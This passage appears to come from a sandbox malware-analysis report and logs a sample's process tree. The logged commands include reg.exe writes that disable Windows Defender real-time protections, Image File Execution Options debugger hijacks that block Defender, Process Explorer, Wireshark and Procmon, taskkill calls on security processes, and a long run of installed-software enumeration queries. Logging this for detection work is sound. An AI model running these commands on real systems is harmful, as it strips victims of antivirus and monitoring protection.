  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1972
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1292
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1552
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1132
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1236
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1116
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1636
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1076
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1528
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1124
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1820
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1336
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:428
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1904
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1704
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1076
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1768
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2144
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:2176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:2188
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2236
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:2260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2272
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:2320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:2340
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:2392
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:2416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2432
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:2456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:2484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2528
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:2552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:2580
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:2644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:2668
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:2712
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:2724
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:2756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:2768
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:2796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:2808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:2832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:2844
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:2868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2880
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:2904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:2940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:2976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:3000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2988
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2052
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:860
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2156
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1848
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2196
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1860
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1604
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2216
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2244
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2300
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2348
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2340
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2400
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2464
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2496
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2548
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1796
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2672
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:2704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:2664
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:2724
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:2776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2768
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:700
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:2748
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:2308
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:2540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:2448
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1400
